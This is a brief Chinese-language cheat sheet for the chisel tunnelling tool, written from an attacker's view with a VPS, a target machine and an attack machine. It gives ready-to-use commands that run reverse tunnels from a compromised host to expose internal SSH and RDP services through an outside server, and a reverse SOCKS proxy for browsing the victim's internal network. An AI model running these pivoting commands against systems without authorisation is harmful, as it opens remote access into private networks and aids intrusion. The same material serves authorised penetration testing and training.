内网穿透工具
下载地址
https://github.com/jpillora/chisel/releases/tag/v1.7.4
使用示例
1. chisel进行ssh内网穿透
//vps上 ./chisel server -p 6666 --reverse //靶机上 ./chisel client -v VPS:6666 R:0.0.0.0:8888:192.168.223.160:22 ./chisel client -v VPS:6666 R:8888:192.168.223.160:22 //攻击机上 ssh -p 8888 root@VPS2. chisel进行远程桌面代理
//vps上 ./chisel server -p 6666 --reverse //靶机上 chisel.exe client -v VPS:6666 R:0.0.0.0:33389:192.168.223.151:3389 //攻击机上连接vps的33389端口3. chisel进行socks代理
//vps上 ./chisel server -p 6666 --reverse //靶机上 chisel.exe client VPS:6666 R:socks //随后在vps上 ssh -C -f -N -g -L 0.0.0.0:23333:127.0.0.1:1080 root@VPS //127.0.0.1监听的是本机上的所有流量,0.0.0.0监听的是所有的IP(不论是不是本机的IP)的流量。所以在vps上把127.0.0.1的1080上的socks流量转发到0.0.0.0的23333端口 //攻击机上使用socksCap或者直接在浏览器中设置代理对内网资源进行访问